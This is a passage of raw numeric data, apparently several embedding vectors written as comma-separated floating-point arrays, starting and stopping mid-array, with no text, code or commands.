5,-0.010188385,-0.048112124,-0.021037048,-0.03396238,-0.021326458,-0.0669176,0.0072619137,-0.0041052564,0.0004137019,-0.013921558,0.023207834,0.0068767737,0.010930587,-0.05048421,-0.027019182,-0.026886325,0.07856954,-0.014707068,-0.0065638255,-0.03118231,-0.039761234,0.013239726,-0.015964419,-0.0042617903,0.0039647087,-0.011011454,-0.04264456,-0.01933586,0.0076242024,-0.018527692,0.023958603,-0.01817748,0.025712065,-0.01957742,-0.009292702,-0.0042539677,0.023936506,-0.053101197,-0.01367669,0.00860452,0.09837743,-0.02296286,0.022334525,0.02534851,0.032879334,-0.0017192862,0.02186159,-0.00082250504,-0.034627788,-0.022900833,-0.027830724,-0.0058375895,0.01796744,-0.022935402,-0.0055945427,-0.034478486,0.060636934,-0.029962532,0.006002492,0.021186016,-0.0019323251,0.055011302,0.007803851,0.007134703,0.0019025087,0.063395485,-0.0026490972,-0.015964644,0.06254701,0.021350577,-0.016531842,-0.02937349,0.0074866433,0.018968863,0.041869514,-0.03786484,-0.020548157,0.022573182,0.016593823,0.027287424,-0.022112003,0.06215155,-0.054096647,-0.014031419,-0.04466244,0.012585437,-0.008745044,0.03729791,-0.0036830453,-0.00227834,-0.010670746,0.022355685,0.019553838,-0.0007350807,-0.047775593,-0.015939882,0.03115337,-0.07617036,0.010866195,-0.0047022095,-0.056197032,0.048081405,-0.030320263,0.0595962,-0.015172756,-0.014315951,0.011475832,-0.024960175,0.016719626,-0.06345533,0.033239536,-0.05123499,0.043939635,-0.033176217,0.048546646,0.073825285,-0.00033872438,-0.00033234022,0.03072792,0.0033175244,-0.04130281,-0.016955009,0.0031266941,-0.03209247,-0.025060404,0.009877051,-0.024488606,0.0058880458,0.05215921,0.021191167,-0.019243473,-0.018142307,-0.014362961,-0.03553914,-0.005863225,-0.015660075,-0.074814476,0.060937446,0.010112052,0.014439335,0.05105109,0.007380371,0.0438916,0.020098738,-0.0046462454,-0.014246704,0.020931667,-0.040213253,-0.014393323,-0.030806322,-0.030379394,-0.030893981,-0.04905721,0.0016288536,0.032342587,0.00010178458,0.025559416,0.008870517,0.012344298,0.018992985,-0.015615816,-0.010267889,0.036214374,0.038704827,0.010108388,0.041745782,-0.009531005,-0.018373115,-0.016774148,-0.06428179,-0.030873368,-0.03329051,-0.017521277,-0.012291501,-0.016521782,0.018127799,0.030392831,0.04868796,0.048784927,0.0033317592,0.010247113,-0.024518467,-0.026032055,-0.010428177,-0.019835811,-0.03361213,-0.02509722,-0.021334212,0.000018517941,0.0034382595,0.013390319,0.011958204,0.00074090867,0.0070783175,0.008981468,0.0006637979,-0.002308075,-0.008108084,0.023811525,-0.026192266,0.059462488,0.036166407,-0.011238464,0.0047597,-0.045065533,0.017751167,0.059335988,0.054662373,0.039026048,-0.018938942,-0.0012688949,-0.0072123418,-0.021560956,-0.008908628,-0.031955298,-0.01956727,0.01977482,-0.0069057997,-0.027276168,-0.048610065,0.010009233,-0.0054869954,0.050316878,0.022304555,-0.012051968,0.0027368255,-0.06680484,-0.025489448,-0.043604538,0.0009917321,0.049931336,-0.030760452,-0.008110352,-0.028420674,0.0069173416,0.09018709,-0.020417104,0.014011815,-0.052797474,-0.061134398,-0.008275315,0.0016172992,0.047272675,0.020518415,0.02808063,0.04575641,0.00035630763,0.009551609,-0.0009799689,-0.01587525,0.05267541,-0.049268123,-0.05051908,0.047137924,0.034403063,0.00147131,0.010775721,-0.027462682,-0.033321347,-0.0035411627,0.017508592,0.051620323,0.033129357,0.013129001,-0.040089086,0.087097384,0.007117983,0.01534191,-0.022105765,-0.034606922,0.029029835,0.023341184,0.038450196,0.0069924016,0.018645743,-0.057976454,-0.06905676,-0.01152733,0.05779741,-0.007673743,0.015746946,-0.029031815,0.007977373,-0.03116502,0.012956079,0.035483375,-0.024942763,0.006679702,0.010222386,0.031955715,0.00059637224,0.020831881,-0.05011867,0.01767597,0.057234038,0.007129434,-0.02554088,-0.05501895,0.040736325,0.04681873,-0.039674345,-0.027357588,0.012891041,-0.03173653,0.048121553,-0.019850621,-0.033878725,0.010124825,0.017445078,-0.021118728,0.030571224,-0.032782935,-0.012242793,-0.0034288608,-0.01629343,0.02807978,0.03245546,-0.031540357,-0.073163345,0.023280768,0.020052612,0.016776288,0.0051648216,-0.00615932,-0.040336594,0.029647581,0.017228812,0.0064647696,-0.016999558,0.015536796,0.05403562,0.01766929,0.075205475,-0.013828878,-0.05871869,0.09317112,-0.010203713,0.018835772,0.008329513,0.035221014,0.03650257,0.019927947,0.066646375,0.0089499,0.07705964,0.0028428158,-0.034314144,-0.0148829,-0.0144274095,0.0107454425,0.027404204,0.052189708,-0.018773712,-0.07439671,0.027533388,-0.004603271,0.03800485,0.047813237,-0.0004697243,0.11024095,-0.053082686,0.0069793365,0.0032013282,0.033620935,0.007083615,0.0070228106,-0.013992772,-0.055844747,0.050295472,-0.012858609,-0.01915026,0.0014944001,-0.046329983,0.02198129,0.040479213,-0.051694784,0.017012442,0.030936396,-0.028189693,-0.01749064,0.0023058457,-0.029256336,-0.0052205618,-0.012609877,0.061517876,0.04316688,-0.042104788,-0.019186962,-0.063914284,-0.021300243,0.057105258,0.009537354,-0.025227504,-0.022178354,-0.018987248,0.059478916,-0.0031412474,0.012637981,-0.029246984,-0.0774765,-0.016931653,0.029280458,0.05293576,0.03319807,0.059980985,-0.01908316,0.03132802,0.0005717439,0.006324284,0.015009997,-0.007354346,0.067157425,-0.06618967,-0.047249112,0.02363012,0.03810759,0.0113131,0.024480619,0.04719383,0.055005193,-0.029913096,0.0045949896,0.02890388,-0.035522122,-0.02190424,0.027208176,-0.034387078,-0.022291478,-0.022436978,-0.07544931,0.002029013,-0.015811928,-0.105665885,-0.0019182689,0.029587096,0.040581528,0.046559237,-0.036163747,-0.009084022,0.0039241845,0.0069816373,0.013502934,-0.0032306393,-0.017538974,0.016497396,0.037264045,0.06020961,0.045878403,0.0043178615,0.024435088,0.01692276,0.0019534107,0.016495911,0.035736658,-0.092279844,0.009390347,-0.039356753,-0.039243814,-0.025065148,0.0493198,-0.014258141,-0.05747576,-0.052401334,-0.04706887,-0.05934016,-0.0425395,0.048910767,0.048493598,0.025491042,0.016428882,-0.03169034,-0.05155067,-0.011706208,-0.0034710732,0.03529386,0.018652288,-0.028502323,-0.005870091,0.008079269,-0.017036919,0.002645948,0.026645325,0.0048122834,-0.056476716,-0.07274096,0.01715526,-0.07071554,0.039894067,0.059207786,0.013641452,0.008356777,-0.07042069,0.019716395,-0.016261999,-0.021657351,-0.003633144,0.00686373,0.03207363,-0.06093482,-0.019472785,-0.023497349,0.020775966,-0.015638933,-0.06302483,-0.06917352,-0.0064696176,0.05660194,0.050465763,-0.07922255,0.0451515,0.04816735,0.009002818,0.027841158,-0.0007199225,-0.011785949,-0.025897611,0.039443854,-0.01471147,-0.0049838303,0.016769597,-0.040041722,0.03902476,0.0053401967,-0.018843664,-0.0027124246,-0.013402885,-0.048867386,0.052850578,-0.09123156,-0.02393123,-0.010941786,-0.022966668,-0.012837295,0.021675441,-0.005501176,-0.06402121,0.0110085085,-0.02057209,0.022421004,-0.054216016,0.0074916775,-0.051503785,0.0351967,0.029025726,0.0072333002,0.017605687,-0.028085602,0.011552066,0.013568713,-0.0035570576,-0.025437707,0.028729528,0.061377767,0.020876434,0.026019206,0.09247611,0.08190582,0.013194557,-0.027613152,0.005790187,0.011321535,0.03261341,-0.021931177,0.007578093,-0.027632736,0.0008869487,-0.006799867,-0.0074023358,-0.029209886,0.024532255,0.0019159865,-0.026454382,-0.008072608,-0.037147343,-0.042474303,0.041085724,0.0020097997,0.00814446,-0.02809973,0.026129682,0.00210344,0.0013755586,0.018388383,0.016563676,-0.016379438,0.015735697,0.032212604,0.03801975,0.0018527926,-0.022635972,-0.0035091315,0.034738347,-0.0010097447,-0.041336764,0.00393287,-0.031157877,-0.015839601,0.019112168,0.014728095,-0.036898404,0.00018428151,0.0073089115,0.011932741,0.027103668,0.05789595,-0.023379352,0.013417638,-0.027758306,0.015289127,0.016047642,-0.00068112166,0.0074649784,0.0035604239,-0.017101472,-0.04796964,0.0030588233,0.0023296205,-0.064381175,0.042579703,0.024880573,-0.0078093116,-0.0036277887,-0.041302193,-0.040480178,-0.0014111389,0.015295546,-0.030720888,-0.037818857,-0.010411566,-0.019181153,-0.012440588,0.002493641,-0.05275815,0.008987497,0.03537839,-0.016140312,-0.061313774,-0.04109055,0.040629465,0.028119378,0.03373094,-0.0009838828,0.016886637,-0.06316325,-0.013242069,-0.05147291,0.053693436,0.011928357,-0.0068676574,-0.03545986,-0.055782918,-0.05783544,0.07532609,0.0025498916,-0.04403803,-0.0061063883,-0.0079099,-0.034696452,0.008038283,-0.026447205,0.0025224318,-0.018765882,0.034427196,0.14909346,-0.0142477015,-0.0008241476,-0.0448758,0.06452924,-0.053559568,-0.0437059,-0.0022782409,0.0036450874,-0.0022633378],[-0.008252982,0.075149916,-0.17056282,-0.02483727,0.10893497,0.011671251,0.075170144,0.04300336,0.021146737,-0.0352486,0.022371642,0.011236629,0.10787678,0.011987294,-0.046520755,-0.0108868955,-0.004729542,-0.07429269,-0.036529377,0.02306768,-0.029286612,-0.039978202,-0.0058819293,-0.052272968,0.043542013,0.0032887172,-0.07296428,-0.044526868,-0.03339463,0.02070143,0.014031689,-0.06660468,-0.034731276,-0.0046511265,-0.06864294,0.0008061663,0.036832716,0.0062881797,-0.0018334567,-0.0035339226,0.06960391,0.016760722,0.008767342,-0.003172576,-0.006030234,0.003097109,0.0035335834,-0.018829145,0.061818007,-0.08403249,-0.026032176,-0.04707086,0.023231927,0.07055896,0.08669549,0.053786665,-0.020708133,0.031508233,0.014499496,-0.08073215,0.10154403,0.055374913,-0.09376098,0.033541635,0.0018685791,-0.020352906,-0.04011445,0.06446113,0.022840586,-0.014802172,0.025816614,-0.027400522,-0.024899762,0.018226659,-0.045539785,-0.0444418,-0.025344338,-0.026793204,-0.04411159,0.049997434,0.049948733,0.0005317656,0.024717266,0.013255373,-0.017504014,-0.01701789,-0.043873273,-0.014504238,-0.00058788824,0.081609145,0.026728999,0.026029987,0.053418014,0.032276053,-0.025185946,0.036733817,-0.0008407353,-0.021606062,-0.03819005,0.0052620224,-0.040008277,0.0014604422,0.034270853,0.012025496,0.037963677,0.013470412,0.024225703,0.0008399856,-0.016102068,-0.017939322,-0.056271736,0.031704772,-0.01847728,0.013931705,-0.020213397,-0.025370952,0.03506838,-0.018296978,-0.04734869,0.021968676,0.022819072,-0.0381292,0.004482628,0.03921628,0.048954703,0.016010303,-0.03325989,0.010787953,-0.025462463,-0.03475412,-0.01884408,-0.017973159,-0.05953736,0.012273602,-0.009078576,0.0979363,-0.03478575,0.014492135,0.03594599,0.053121354,0.023765575,0.03409187,-0.025469372,-0.026806915,-0.010730998,-0.020155896,-0.0066496064,0.002470046,-0.0024368027,0.021167697,-0.0057150545,0.03428852,-0.014073626,0.009274052,0.044199254,-0.025535073,0.02589908,-0.004581628,0.044738363,0.052922804,0.04994581,0.022666177,-0.0028924053,0.067143835,0.012729405,-0.022760196,0.000040243413,0.026840765,-0.009823379,0.06686393,-0.06884384,-0.011712333,0.005705463,-0.008174862,0.006363448,-0.015562371,0.07735401,-0.02697099,0.019975808,-0.023868661,0.018732566,-0.042382006,0.045212477,0.013877284,0.030016271,-0.035104856,-0.009349748,0.016832879,-0.015458379,-0.054445192,0.003694603,-0.024573855,-0.08667818,-0.009055271,-0.06524769,-0.050953053,0.0365242,-0.009184546,0.038858585,-0.02007608,-0.041743774,0.0007106431,-0.03084209,-0.0027011563,-0.039699323,0.055884697,-0.0038138623,-0.008758235,-0.04697605,0.014596307,0.06515064,-0.005398645,0.0469893,0.023251742,-0.006686328,-0.023529928,-0.022308188,-0.0117151085,-0.043456107,-0.009044029,0.011268449,-0.038246993,-0.019999146,-0.00009285162,-0.0126827415,-0.010074361,-0.04162953,-0.027777035,-0.027768072,0.021993931,0.04102011,-0.06922801,0.057380524,-0.011319153,0.045463998,0.034136504,0.0026421514,0.028043058,0.020584844,0.05009408,0.025536412,0.033938304,-0.055613026,-0.045736097,-0.007139892,-0.057320334,0.00397941,-0.020581108,-0.024426134,0.0298779,0.0029006018,0.04786522,0.023509959,0.031410746,0.02613148,-0.018343093,0.0021139253,0.010153838,0.05739475,0.03282216,0.048834942,-0.032660883,-0.015902817,-0.010588397,-0.026255656,-0.0330248,-0.038335912,-0.045718003,0.010026231,0.0008914035,0.04111836,0.024679262,0.030110853,0.025603358,-0.008596873,0.027498232,-0.0124605205,-0.020588681,-0.0047965245,0.02005779,-0.04321012,-0.0070717735,-0.025845727,0.0060600745,0.018002406,0.031144092,0.03794079,-0.011461657,0.026983215,0.02141952,-0.0107983565,-0.0112123685,0.007876746,0.0413562,0.010284198,0.017960085,0.0696952,-0.034355827,0.0005791849,-0.052832667,0.017126264,0.028254114,0.081333034,0.027953768,-0.023051983,-0.033640496,-0.0037735237,0.005052855,0.042137753,-0.016472809,-0.061688684,0.0042168214,-0.016557323,-0.033642177,0.03468407,-0.0032480191,0.036160607,0.059073795,0.024514986,-0.014899978,0.057147987,-0.050404184,-0.056470063,-0.05656072,-0.029719098,0.039373416,-0.018054385,-0.022250503,-0.047261808,0.0015840414,0.04020931,0.03794269,0.025516136,-0.029373126,-0.013194364,-0.0057223234,0.011950198,0.0222581,0.014486302,0.021644736,0.017434545,0.007817022,0.010124219,-0.02544765,-0.0011130773,0.042709813,-0.020347638,-0.020206293,0.015826792,0.031242803,-0.010450678,0.026979625,-0.02597784,-0.03793181,0.04377573,0.0282207,0.029871454,0.04724735,0.052716587,-0.05117491,0.038242985,0.028148219,-0.013789552,-0.030076716,-0.03123402,0.019870648,0.041162454,0.00976022,0.007914278,0.02955872,-0.015742501,-0.031933006,0.014452244,0.028062692,-0.023292335,0.035049174,-0.041680157,0.03535339,-0.010125136,-0.027621066,0.042505722,-0.021818275,-0.017667085,-0.012674692,-0.012304944,-0.012310245,0.018295957,-0.040774953,0.026018683,0.024492498,0.0004095521,-0.008280859,-0.051636048,0.0092597455,0.005644824,-0.035282176,-0.008408701,-0.018251024,-0.016480412,0.081339814,-0.046306424,-0.045189258,0.012299399,0.033921722,-0.04693789,0.04410916,-0.03737638,0.002747566,0.043845296,0.007976939,0.029930104,0.023708617,-0.07061915,-0.060890526,-0.018003045,0.055909425,0.03469189,-0.01324764,-0.0153439315,-0.030623676,0.025847988,0.039569665,0.03360967,-0.017711602,-0.021444358,0.033627972,0.04891478,0.029511994,-0.019446354,-0.02059519,0.089312755,-0.011141199,0.018082093,-0.009870805,0.0057158265,0.042137146,0.023343857,0.07823048,0.0012243094,0.04030053,0.026985498,-0.03018482,-0.03360255,-0.063043356,-0.0037740185,0.044070665,0.06001217,0.0120290695,-0.077603534,0.037613086,-0.017200945,0.0046946397,0.07430509,-0.0019659607,0.06632004,-0.033818975,0.011000089,0.004993434,0.032312054,0.028524399,-0.007106944,-0.0026035728,-0.06278272,0.02940531,0.009654858,-0.031746514,0.0029065365,-0.04618108,0.04642128,0.09157467,-0.036306065,0.0044424846,0.019445147,-0.020681003,-0.036069326,0.018376524,-0.040485665,0.006977783,-0.016026704,0.024581201,0.004073071,-0.047583796,-0.024175912,-0.036132935,-0.033535726,0.02648761,0.008484348,-0.015156656,0.004109242,-0.008187458,0.022530379,0.019909754,0.000091648515,-0.034082368,-0.08097101,-0.054618996,-0.034972154,0.012850618,0.043760613,0.011558219,0.0010180795,0.03680695,0.0003966828,-0.008452946,0.010307488,-0.016928742,0.03601821,-0.06499196,-0.055048726,0.017256405,-0.02056773,-0.009411384,-0.009537801,0.033963002,0.057496604,-0.046776414,0.027712079,0.04637337,-0.03401984,0.04268855,0.041477658,-0.008236666,-0.009750716,0.004634363,-0.04869403,0.0060509495,-0.017946498,-0.062397618,0.044975683,-0.004973306,0.039342113,0.061160512,-0.04306573,0.024730535,0.030606836,-0.0036498746,0.004661159,-0.0032248641,0.009720537,0.04116619,-0.013189239,0.04065788,0.05393257,-0.028154748,0.038956653,-0.030643243,-0.0354491,-0.0134141585,0.0053091384,-0.088128075,0.016361708,-0.08466322,0.00430447,-0.010559424,0.011723125,-0.01856314,-0.011494086,-0.024142202,-0.03404739,-0.036989883,-0.0031712549,0.0052065635,0.050009787,0.010663725,0.007268053,-0.017788613,-0.02641871,-0.01030998,-0.00901089,0.014276627,-0.009142121,-0.07679842,-0.029364815,-0.018676829,-0.036193315,0.0006151779,0.017065134,-0.006252269,-0.029703835,-0.072628774,0.032638326,-0.034603767,0.0100450115,0.0549305,0.014141682,-0.03547207,-0.1243191,0.01398295,-0.0073674517,-0.056352787,-0.047028955,0.0072971457,0.023754308,-0.05206377,-0.006168955,-0.017535452,0.037324708,0.0064482335,-0.0666459,-0.06209607,0.0038780184,-0.002633421,0.039252985,-0.058458716,0.052329198,0.06004013,0.0019248936,0.015082474,-0.0067165173,-0.024978442,-0.032757338,0.022272905,-0.035153866,0.029545322,-0.009919905,-0.05503111,0.055741154,-0.043473665,0.009358833,-0.038583487,-0.04457145,-0.06617562,0.045537345,-0.054204945,0.03542255,-0.02113494,-0.006787511,-0.033921972,0.0045518386,0.022046426,-0.06453578,0.01008564,-0.0041546617,0.00091233273,-0.078891784,0.009775174,0.005596788,0.016025972,0.013373975,0.06847291,0.049299236,-0.0310657,-0.008560567,0.05295911,0.04362177,-0.019635221,0.04196373,0.074190624,0.02101237,-0.012690386,0.06272193,0.0760843,0.0041629695,-0.0050885277,0.012667654,-0.03206017,0.042258583,-0.012565256,0.029365167,-0.006101787,0.0039498033,-0.044322416,0.018144174,0.002245011,-0.011012117,-0.042177293,-0.05330862,0.010170498,-0.020761099,0.0049941894,0.075527824,0.004245481,0.033426877,-0.022804044,0.049827103,0.026350772,-0.032188226,-0.012835488,-0.009360404,-0.023135092,-0.04047045,0.000095081734,0.04969157,-0.041162755,0.016626634,-0.009132249,-0.011999509,-0.021642746,-0.031082204,-0.031819355,-0.0035751406,-0.037167847,-0.018391158,-0.0055482145,0.004244701,0.032780804,0.005492641,-0.03256553,0.014562644,0.0389529,-0.026279582,0.015811251,-0.036041215,0.017407212,0.017164566,0.014149296,0.028425239,-0.01337523,-0.029918123,-0.0739743,-0.026382888,-0.033336267,-0.04353046,0.06613617,0.039816067,0.018912777,0.006823321,-0.0133605935,-0.037733123,0.031877883,0.049226046,-0.009455615,-0.0542874,-0.0033044512,0.036270443,0.01163533,0.06250644,-0.059104364,0.0085991,0.012554325,0.016062623,-0.027799577,-0.04736959,0.024582231,0.028071597,0.024997013,0.014016205,0.007614313,-0.042252477,-0.014093906,-0.005254875,0.0381417,-0.004260601,0.008590052,-0.0017123251,-0.008750537,-0.0139286695,0.067298226,-0.020795489,-0.051241677,0.012294602,0.00910464,-0.020832943,0.020646729,-0.042711094,0.028917002,0.006233718,-0.008624566,0.10836717,0.007822578,0.022377923,-0.03849354,0.06344898,-0.034022607,-0.058735836,-0.033732213,-0.023532635,-0.020647937],[0.028218718,0.10263044,-0.17941506,-0.04459302,0.07401778,-0.013373398,0.021000847,0.05075655,-0.037942164,-0.021216458,-0.029762696,-0.010201088,0.09505788,-0.017407797,0.006973855,-0.0005487899,-0.008562095,-0.059869025,-0.009941879,0.02321336,-0.029317817,0.013804354,-0.06536691,-0.0066204327,0.05991457,0.023580763,-0.0005483269,-0.036188673,0.0013284585,-0.04371331,0.03884407,-0.017240487,0.016926963,-0.0030535178,-0.10913463,-0.089414045,0.028950594,0.051916275,-0.0134026855,-0.0071880445,0.090660706,0.033336397,-0.038012095,-0.028759247,-0.002195366,0.031728353,0.015954152,-0.0309964,0.06215453,-0.04358202,0.039559014,-0.033760253,0.026294922,0.07572108,0.056855034,0.068828724,-0.030164888,0.077049546,-0.0026424967,-0.096910775,0.09479483,0.033783894,-0.06474274,0.054818552,0.028141147,0.009114575,0.004314285,0.047502343,0.037975863,-0.041592423,0.031245828,0.035736125,0.0003301039,0.008888935,-0.029567286,0.018099345,-0.041798443,-0.022704594,-0.027439611,0.046212245,0.037495825,0.0016975498,0.08284913,0.007027149,0.026889363,0.023924276,-0.034287862,-0.041441154,0.021596787,0.07705295,0.034994405,0.012316148,0.0480563,0.005709826,-0.038480997,0.024149759,-0.024697252,0.009763652,-0.0517235,-0.006846749,-0.06485383,-0.027669566,0.04952951,0.02584949,0.0031986851,0.02197827,-0.0036078033,0.003393255,-0.04182888,-0.032167826,-0.04082282,0.019293984,-0.004077712,0.025706623,-0.053460576,-0.00035838355,0.063085474,0.014704525,-0.052834284,0.06283322,-0.040093046,-0.042901494,0.06710771,0.055764757,-0.016093723,0.01214743,-0.020001184,0.008642174,-0.006014048,-0.0184198,0.0030931085,-0.0013673718,-0.046267163,0.0056988266,0.06772259,0.06218588,-0.03043409,0.005881558,0.0013973523,0.017799964,0.027472408,0.026465658,-0.022990195,-0.04545756,-0.027408985,-0.047897685,0.0017026322,0.008424277,-0.032976203,0.014078324,0.0024908762,0.0010153875,-0.050555672,0.0063096774,0.00923837,-0.026822165,0.04052459,-0.021737022,0.015637856,0.027278906,0.05081432,-0.004505687,-0.028232075,0.0550628,-0.009098498,-0.0476339,-0.00087506295,0.031712126,0.0076274727,0.06395479,-0.032455824,-0.038241178,-0.021205874,-0.020477733,0.05055812,-0.030276647,0.047621123,-0.017816562,0.046771675,-0.028676037,0.01972366,-0.05779963,0.028252004,-0.024690289,-0.044702396,-0.017762102,0.0061500603,-0.041088775,0.019749084,-0.04493828,-0.0030510435,0.01390874,-0.05326616,-0.013347027,-0.006253659,-0.014474158,0.030924411,0.022142079,-0.01916331,0.0017410032,-0.04635008,0.020185966,-0.042843886,-0.0015180698,-0.02184119,0.085867345,0.000049847153,-0.022887174,-0.034811936,0.033321906,0.057588246,-0.041573275,0.017979087,0.02890342,0.03887811,-0.017983349,-0.009329028,-0.00040747615,-0.021324482,-0.022657165,-0.02666496,-0.015781425,0.044755455,-0.004298597,0.004124196,-0.03662412,-0.04343406,-0.015094671,-0.013876749,0.006068845,-0.008682082,-0.09615226,0.008341576,0.0060362318,-0.007172521,0.029343948,0.010680349,0.04838053,0.0024682612,0.030800346,0.012415444,0.025698345,-0.032681838,-0.029602857,-0.04144919,-0.002812076,-0.0033381768,-0.004363217,-0.014714924,0.06290656,0.026137913,0.01588905,0.056446698,-0.014970399,0.032175113,-0.03244993,-0.025626238,-0.0008591434,0.010645814,0.072415635,0.052887212,-0.01708018,0.04461713,0.0076750144,-0.061373923,-0.03460783,-0.03679692,0.020592613,0.026728883,-0.023306914,0.04871188,-0.00073300046,0.015934482,0.042054005,0.01548085,-0.00052499305,-0.033855524,-0.01483931,-0.06643618,-0.007053156,-0.054389175,-0.04940769,-0.008042331,-0.019344375,-0.0072556487,0.045423675,0.0013774731,0.046084937,0.019799199,0.01411578,0.021249287,0.0066961497,-0.03131533,0.03447552,-0.015268532,0.044220675,0.0057586776,0.043559734,0.030634077,-0.028824985,0.029711092,0.037712824,0.054611072,0.079153076,-0.034047753,-0.003886437,-0.008073524,0.0011408407,0.029926931,-0.05134624,-0.027268955,-0.012713854,-0.03904943,-0.0023567916,-0.043967787,0.04724892,0.04353632,0.046178594,0.030698618,0.011197367,0.011318497,-0.061372533,0.014536569,-0.087941885,-0.010727128,0.045039967,-0.038442455,0.007169572,-0.028270097,-0.026498342,0.034114208,0.021706998,0.040321488,-0.03981372,-0.05617776,0.047462624,0.006317168,-0.009445306,0.01719542,0.05604347,0.1001216,-0.005792151,0.043120068,-0.049759865,-0.014856671,-0.026516214,-0.039431557,-0.0020259377,0.043635666,0.032777943,-0.029105661,-0.02268374,-0.004059788,-0.04535508,0.018337369,-0.0042867605,0.028080814,0.07890045,-0.008962302,-0.03966006,0.067560785,0.033026915,0.014761993,0.0031563651,0.0005420205,0.062051408,0.049805574,0.0018717689,-0.0006914243,0.07393865,-0.031607464,-0.029359676,-0.0038278385,0.019615995,0.02420155,0.0018002918,-0.0849941,-0.007561299,-0.006658821,0.03953468,0.05490513,0.014398277,-0.027143912,0.0028169798,0.011168981,-0.033468083,0.0056530493,-0.021649573,0.026618555,0.022993106,-0.018936096,-0.011979689,-0.05381571,0.017494734,0.028527176,-0.034376908,0.0079001095,0.018004013,-0.00445156,0.062992506,-0.03794609,-0.06264602,0.0022308177,0.025085717,-0.025102636,0.050929945,-0.039595492,-0.032023985,0.007541257,-0.01208727,-0.00020590422,0.020496394,-0.061022036,-0.040962387,0.00022094663,0.06515228,0.0013188699,-0.016203629,-0.014163772,-0.008129103,0.04673711,0.026074873,0.032881476,0.0058840406,0.022060476,0.046530563,0.06180914,0.046383556,-0.029279746,-0.045922827,0.08011134,0.023938572,0.07331246,0.028452192,-0.028976252,0.024130248,-0.0064896904,0.036805905,-0.01539322,0.038564373,0.019210352,-0.04582266,-0.022008352,-0.05003081,0.0075853565,0.03441434,0.014135638,-0.0075341915,-0.07848219,0.009774546,0.017997041,0.014687028,0.028955406,0.031599976,0.09326357,-0.030598413,-0.0003383344,0.013152209,0.012033814,0.0074002277,0.012613448,0.04630045,-0.031571653,0.016321518,0.006488066,-0.05640944,-0.00480402,-0.056585558,0.046463933,0.055618968,-0.037633315,-0.00091679976,0.01891812,-0.043741502,-0.020106006,-0.0007288824,-0.010162816,-0.018545974,0.003973563,0.027632773,0.010963851,0.0067149093,-0.028574534,-0.029373204,0.016792156,0.042653646,0.04299373,-0.035707507,-0.003555704,-0.0010972334,0.05631282,0.0025604723,-0.005973841,-0.022840364,-0.052272364,-0.001595751,-0.0064562513,0.010743907,-0.0018224448,0.0076392484,0.024482615,0.03794159,0.0028761944,-0.028594822,0.015347572,-0.025199668,0.038773358,-0.038423575,-0.0799841,-0.022978192,0.008695872,0.0012725543,-0.0128216185,-0.00005643229,0.042035457,-0.07365464,-0.015384937,0.038626604,-0.03458876,0.025365364,-0.0009404102,-0.030882038,-0.0009982915,-0.025748743,-0.0663746,-0.0020848473,0.03725591,-0.07223287,0.056639474,0.05076158,0.027247649,0.07350169,-0.029002814,0.022244727,0.020185841,-0.0032020307,-0.02593487,-0.017547414,0.062319264,0.030720893,-0.017064309,0.021029444,0.006266687,0.02673318,0.084999084,-0.0288286,0.032571632,0.035555802,0.014740493,-0.096862026,0.011210163,-0.0762034,-0.0056505455,-0.005688306,0.026706226,-0.049377896,-0.024303064,-0.0013834797,-0.020766161,-0.015850432,-0.019294482,0.044437982,0.03792605,-0.0055438974,0.005171049,0.00035211083,0.005848794,0.0059841103,0.00905767,0.004850361,0.015587742,-0.053309206,-0.0057475674,-0.00800157,-0.0041947966,-0.011487157,0.028184963,-0.011541646,-0.027125137,-0.07222315,-0.0063124453,-0.039486837,0.023617754,0.033420227,-0.0031908131,-0.017376129,-0.028922413,-0.03416726,-0.07269308,-0.021927847,-0.03101165,0.01894462,0.0398112,-0.027167076,0.014910395,0.014221078,0.040596902,-0.0021189325,-0.04588819,-0.060376976,-0.029199064,0.027241528,0.03017391,-0.067484364,0.015912306,0.0066328393,-0.013632387,0.0636795,-0.0008669374,0.012355362,0.008526944,-0.0016017329,-0.04331844,0.0021290286,0.029178293,-0.032685142,0.036004942,-0.029341366,-0.014360228,0.009685741,-0.030276397,-0.019866718,0.046101835,-0.036147397,0.0064405645,-0.006108944,-0.1031207,0.039178804,0.014563324,0.030085444,-0.05001199,0.023826363,-0.036851447,-0.010288333,-0.051111024,0.026424807,-0.021221261,-0.009273046,-0.0041972953,0.04165322,0.018082742,-0.028204288,-0.0077390694,0.027221713,0.043855477,-0.012103652,0.011270427,0.018185526,0.043059982,-0.015036017,0.08706586,0.053565767,-0.017585468,-0.015474028,-0.045862645,-0.03912186,0.018276678,-0.015371768,-0.044423454,-0.026467038,0.020902254,-0.013743791,-0.010884697,-0.040589716,0.04237941,0.003773295,-0.024685273,0.0024690628,-0.031717375,-0.013394319,0.032468524,-0.012850887,0.02186153,-0.01369166,0.031302813,0.020438038,0.01656998,-0.0002973292,-0.0064193057,-0.021488931,-0.012198657,0.039090466,0.010056271,-0.036453042,0.018373359,-0.027612057,0.026657224,-0.019599855,-0.03505282,0.001555347,-0.036337037,-0.050079446,-0.024175284,0.019170476,0.0052789412,0.04339111,-0.014293919,0.0029876276,-0.055236664,0.03378065,0.0045879157,0.01026875,-0.02650417,0.013758536,-0.010262884,-0.031662617,0.02342211,0.00289523,-0.016304472,-0.053537466,-0.010292081,0.006083329,-0.023876214,0.022792289,0.027606927,0.02763132,-0.020103792,-0.03962518,-0.038836207,-0.0312556,0.033018645,-0.02137976,-0.06745483,-0.04298553,0.007796751,0.00486389,-0.016742319,-0.03973963,-0.006477374,0.002885235,-0.006776699,-0.044250924,-0.048961323,0.049653914,-0.01864519,-0.0045963926,-0.014006338,-0.0415485,-0.06957976,0.0046740053,-0.083772704,0.0076031894,-0.0131204985,0.033301327,-0.026454004,-0.047627106,-0.033999577,0.038944483,0.002011899,-0.029054722,-0.0036007636,-0.015707469,-0.026589267,0.023502877,0.012695316,0.018255027,0.023421014,0.015421235,0.10421735,0.057001527,0.008492766,0.004043912,0.071980014,0.0033968715,-0.032516588,-0.074306995,0.013405398,-0.0013133147],[0.05686812,0.005904033,-0.1455542,-0.023610253,0.09050372,0.02152873,0.02654774,0.0253755,-0.020999586,-0.025191762,-0.019218806,0.028777387,0.042339012,0.065093644,0.017861715,-0.040658012,0.033860266,-0.05169639,0.009413505,0.060004808,-0.05600997,0.024141947,-0.048875317,-0.03486098,0.081707515,0.028561367,-0.06584444,0.031313732,-0.054719526,0.011275859,0.04458225,-0.056739178,-0.01182852,-0.03167249,-0.08722925,-0.047626156,0.04576429,-0.0033789892,-0.010766104,0.02428492,0.038540047,0.048214138,-0.009445627,-0.048998576,0.01612238,-0.019133687,0.021282364,0.02296711,0.051410045,-0.069082506,-0.017662974,-0.05353585,